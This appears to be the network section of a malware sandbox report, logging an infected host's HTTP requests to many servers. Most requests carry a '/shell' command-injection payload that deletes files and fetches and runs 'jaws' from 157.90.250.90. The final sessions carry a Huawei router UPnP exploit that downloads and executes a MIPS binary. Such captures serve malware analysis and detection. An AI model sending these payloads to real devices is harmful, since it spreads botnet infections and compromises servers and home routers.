                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          128192.168.2.234818287.255.233.5380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:08.655481100 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:08.937916994 CET117INHTTP/1.1 500 Server Error
                                                          Content-Length: 42
                                                          Date: Tue, 02 Jan 2024 05:24:08 GMT
                                                          Connection: close
                                                          Jan 2, 2024 06:24:08.938493967 CET54INData Raw: 45 72 72 6f 72 20 35 30 30 3a 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 42 61 64 20 72 65 71 75 65 73 74 3a 20 5b 47 45 54 5d
                                                          Data Ascii: Error 500: Server ErrorBad request: [GET]


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          129192.168.2.2346650206.238.103.10580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:08.700706959 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:09.018919945 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:08 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          130192.168.2.235939047.90.200.13480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:08.717627048 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          131192.168.2.234891623.214.139.1780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:08.852245092 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:09.077578068 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:08 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:08 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 66 33 39 64 64 35 38 26 23 34 36 3b 31 37 30 34 31 37 33 30 34 38 26 23 34 36 3b 36 62 62 66 62 37 64 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;cf39dd58&#46;1704173048&#46;6bbfb7d6</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          132192.168.2.2350494104.82.158.9880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:08.856573105 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:09.086863995 CET429INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 207
                                                          Expires: Tue, 02 Jan 2024 05:24:08 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:08 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 65 64 31 31 31 30 32 26 23 34 36 3b 31 37 30 34 31 37 33 30 34 38 26 23 34 36 3b 63 37 65 36 63 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;3ed11102&#46;1704173048&#46;c7e6cf</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          133192.168.2.234704889.31.76.4580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:08.904728889 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:09.156289101 CET559INHTTP/1.1 301 Moved Permanently
                                                          Date: Tue, 02 Jan 2024 05:24:09 GMT
                                                          Server: Apache
                                                          Location: http://webmail.labellum.it/shell?cd+/tmp%3brm+-rf+*%3bwget+
                                                          Content-Length: 267
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 65 62 6d 61 69 6c 2e 6c 61 62 65 6c 6c 75 6d 2e 69 74 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 25 33 62 72 6d 2b 2d 72 66 2b 2a 25 33 62 77 67 65 74 2b 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://webmail.labellum.it/shell?cd+/tmp%3brm+-rf+*%3bwget+">here</a>.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          134192.168.2.2358250152.67.216.18080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:09.004126072 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:09.305883884 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:09 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          135192.168.2.2352608206.233.253.22480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:09.052927017 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          136192.168.2.2359592158.94.0.20680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:09.082310915 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:09.312453985 CET420INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:09 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          137192.168.2.233603823.12.99.17180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:09.103574038 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:09.354262114 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:09 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:09 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 34 35 66 37 61 35 63 26 23 34 36 3b 31 37 30 34 31 37 33 30 34 39 26 23 34 36 3b 32 63 36 61 35 34 30 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;345f7a5c&#46;1704173049&#46;2c6a5406</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          138192.168.2.235257449.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:09.124772072 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 30 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:08Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          139192.168.2.233471238.181.35.21980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:09.179650068 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:09.483020067 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:09 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          140192.168.2.234820887.255.233.5380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:09.207309008 CET117INHTTP/1.1 500 Server Error
                                                          Content-Length: 48
                                                          Date: Tue, 02 Jan 2024 05:24:09 GMT
                                                          Connection: close
                                                          Jan 2, 2024 06:24:09.208609104 CET60INData Raw: 45 72 72 6f 72 20 35 30 30 3a 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 43 6c 69 65 6e 74 20 63 6c 6f 73 65 64 20 63 6f 6e 6e 65 63 74 69 6f 6e
                                                          Data Ascii: Error 500: Server ErrorClient closed connection


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          141192.168.2.235671413.244.84.14680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:09.228400946 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:09.603708029 CET496INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:09 GMT
                                                          Server: Apache/2.4.29 (Ubuntu)
                                                          Content-Length: 302
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 37 32 2e 31 37 2e 30 2e 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.29 (Ubuntu) Server at 172.17.0.2 Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          142192.168.2.2359818202.75.28.17580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:09.284358978 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:09.652014017 CET614INHTTP/1.1 400 Bad Request
                                                          Server: Mini web server 1.0 ZTE corp 2005.
                                                          Accept-Ranges: bytes
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache,no-store
                                                          Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 54 4d 4c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <HTML> <HEAD><TITLE>400 Bad Request</TITLE></HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"> <H2>400 Bad Request</H2>Your request has bad syntax or is inherently impossible to satisfy.</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          143192.168.2.2351010156.247.27.1537215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:09.783412933 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:11.343136072 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
